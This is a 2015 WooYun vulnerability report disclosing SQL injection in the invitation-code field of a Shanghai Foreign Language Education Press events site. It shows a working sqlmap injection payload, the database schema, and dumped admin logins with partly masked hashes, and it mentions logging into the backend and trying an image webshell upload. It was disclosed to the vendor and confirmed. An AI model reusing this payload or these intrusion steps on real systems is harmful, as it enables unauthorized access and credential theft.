当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138162

漏洞标题:上海外语教育出版社某站漏洞已进入后台

相关厂商:sflep.com

漏洞作者: 路人甲

提交时间:2015-08-31 16:21

修复时间:2015-10-15 16:24

公开时间:2015-10-15 16:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-31: 细节已通知厂商并且等待厂商处理中
2015-08-31: 厂商已经确认,细节仅向厂商公开
2015-09-10: 细节向核心白帽子及相关领域专家公开
2015-09-20: 细节向普通白帽子公开
2015-09-30: 细节向实习白帽子公开
2015-10-15: 细节向公众公开

简要描述:

厂商很给力,秒确认。在来一发。

详细说明:

http://events.sflep.com/mt/index.aspx
邀请码输入框存在注入。
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: txtMICode (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __EVENTTARGET=button1&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4MTI0
ODQ5MmRk2ysOwk5FkNBxGCZZ/KHzAx3O4uBL9M/gNqY6hJiJojI=&__EVENTVALIDATION=/wEdAAMz7
G3sG1QTdCAO6JI8QGzvhr8PpKSDDfMwV8N40xYy57H1uWQrHqYRgG5PSRJ1ZecpgyJ79/KMk9Kz0rG77
CBaadhMTn4z5ip+1vIcwNJH4A==&txtMICode=a' AND 6427=CONVERT(INT,(SELECT CHAR(113)+
CHAR(113)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (6427=6427) THEN CHAR
(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(118)+CHAR(113))) AND
'VCIM'='VCIM
---
[14:11:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 4.0.30319, ASP.NET, Nginx
back-end DBMS: Microsoft SQL Server 2000
current database: 'events'
Database: events
[13 tables]
+--------------------------------------------+
| Admins |
| BigColumns |
| Meetings |
| PointsBBS |
| RegInfo |
| RegTemplate |
| S_City |
| S_District |
| S_Province |
| SmallColumns |
| dtproperties |
| sysconstraints |
| syssegments |
+--------------------------------------------+
+----------------+----------------------------------+
| LoginName | LoginPassword |
+----------------+----------------------------------+
| admin | 6ACFA7AD8BC2088--FA0--F0934EAE2F |
| xxxxxx | E3CEB5881A0A1FD--D0--96D7554868D |
| xxxxxxxxx | 96E79218965EB72C--A==9DD5A330112 |
| xxx | 4CA7C2F1A2B2BC1--25--60506784A90 |
得到账号密码,进入后台

系统信息.png


会议信息列表.png


ii7.0,上传了图片马,看存不存解析漏洞,没有访问成功,别的未测试。

漏洞证明:

1

修复方案:

1

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-08-31 16:23

厂商回复:

感谢提出漏洞

最新状态:

暂无